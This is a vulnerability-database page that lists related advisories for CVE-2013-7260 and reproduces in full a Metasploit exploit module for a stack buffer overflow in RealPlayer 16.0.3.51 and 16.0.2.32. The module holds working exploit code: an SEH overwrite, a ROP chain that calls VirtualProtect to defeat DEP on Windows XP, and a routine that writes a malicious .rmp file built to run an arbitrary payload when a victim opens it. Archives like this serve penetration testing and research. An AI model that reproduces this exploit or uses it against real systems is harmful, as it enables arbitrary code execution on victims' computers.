Lucene search
K

RealNetworks RealPlayer Version Attribute Buffer Overflow

🗓️ 20 Dec 2013 21:37:09Reported by Gabor SeljanType 
metasploit
 metasploit
🔗 www.rapid7.com👁 29 Views

RealNetworks RealPlayer Buffer Overflow 16.0.3.51 & 16.0.2.3

Related
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2013-7260
24 Dec 201300:00
circl
CVE
CVE-2013-7260
3 Jan 201420:00
cve
Cvelist
CVE-2013-7260
3 Jan 201420:00
cvelist
Exploit DB
RealNetworks RealPlayer 16.0.3.51/16.0.2.32 - '.rmp' Version Attribute Buffer Overflow
24 Dec 201300:00
exploitdb
exploitpack
RealNetworks RealPlayer 16.0.3.5116.0.2.32 - .rmp Version Attribute Buffer Overflow
24 Dec 201300:00
exploitpack
NVD
CVE-2013-7260
3 Jan 201420:55
nvd
OpenVAS
RealNetworks RealPlayer Buffer Overflow Vulnerability (Dec 2013) - Windows
26 Dec 201300:00
openvas
Prion
Heap overflow
19 Dec 201322:55
prion
Prion
Stack overflow
3 Jan 201420:55
prion
Tenable Nessus
RealPlayer for Windows < 17.0.4.61 RMP Buffer Overflow
31 Dec 201300:00
nessus
Rows per page
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::FILEFORMAT
  include Msf::Exploit::Seh

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'RealNetworks RealPlayer Version Attribute Buffer Overflow',
      'Description'    => %q{
        This module exploits a stack-based buffer overflow vulnerability in
        version 16.0.3.51 and 16.0.2.32 of RealNetworks RealPlayer, caused by
        improper bounds checking of the version and encoding attributes inside
        the XML declaration.

        By persuading the victim to open a specially-crafted .RMP file, a
        remote attacker could execute arbitrary code on the system or cause
        the application to crash.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Gabor Seljan' # Vulnerability discovery and Metasploit module
        ],
      'References'     =>
        [
          [ 'BID', '64695' ],
          [ 'EDB', '30468' ],
          [ 'OSVDB', '101356' ],
          [ 'CVE', '2013-7260' ],
          [ 'US-CERT-VU', '698278' ],
          [ 'URL', 'http://service.real.com/realplayer/security/12202013_player/en/' ]
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread'
        },
      'Platform'       => 'win',
      'Payload'        =>
        {
          'BadChars'   => "\x00\x22",
          'Space'      => 2396
        },
      'Targets'        =>
        [
          [ 'Windows XP SP2/SP3 (DEP Bypass) / RealPlayer 16.0.3.51/16.0.2.32',
            {
              'OffsetROP'  => 44,
              'OffsetMenu' => 11052,      # Open via File -> Open
              'Ret'        => 0x5acceecd  # ADD ESP,428 # RETN 10 [mswmdm.dll]
            }
          ],
        ],
      'Privileged'     => false,
      'DisclosureDate' => '2013-12-20',
      'DefaultTarget'  => 0))

      register_options(
        [
          OptString.new('FILENAME', [ false, 'The file name.', 'msf.rmp'])
        ],
      self.class)

  end

  def exploit

    rop_nop =
    [
      0x77c1c552   # RETN (ROP NOP) [msvcrt.dll]
    ].flatten.pack('V*')

    rop_gadgets =
    [
      0x77c21d16,  # POP EAX # RETN [msvcrt.dll]
      0x77c11120,  # &VirtualProtect() [IAT msvcrt.dll]
      0x77c1bb36,  # POP EBP # RETN [msvcrt.dll]
      0x77c20497,  # skip 4 bytes [msvcrt.dll]
      0x77c2362c,  # POP EBX # RETN [msvcrt.dll]
      0x0000095c,  # 0x0000095C-> EBC
      0x5acb2caf,  # POP EDX # RETN [mswmdm.dll]
      0x00000040,  # 0x00000040-> EDX
      0x77c1f519,  # POP ECX # RETN [msvcrt.dll]
      0x77C5D305,  # &Writable location [msvcrt.dll]
      0x77c23b47,  # POP EDI # RETN [msvcrt.dll]
      0x77c47a42,  # RETN (ROP NOP) [msvcrt.dll]
      0x77c2ed13,  # POP ESI # RETN [msvcrt.dll]
      0x77c2aacc,  # JMP [EAX] [msvcrt.dll]
      0x77c12df9,  # PUSHAD # RETN [msvcrt.dll]
      0x77c35459   # PUSH ESP # RETN [msvcrt.dll]
    ].flatten.pack('V*')

    sploit =  rand_text_alpha_upper(target['OffsetROP'])
    sploit << rop_nop
    sploit << make_nops(16)
    sploit << rop_gadgets
    sploit << make_nops(16)
    sploit << payload.encoded
    sploit << generate_seh_record(target.ret) # Open via double click (2540)
    sploit << rand_text_alpha_upper(target['OffsetMenu'])
    sploit << generate_seh_record(target.ret) # Open via File -> Open (13600)
    sploit << rand_text_alpha_upper(17000) # Generate exception

    # Create the file
    print_status("Creating '#{datastore['FILENAME']}' file ...")
    file_create("<?xml version=\"" + sploit + "\"?>")

  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation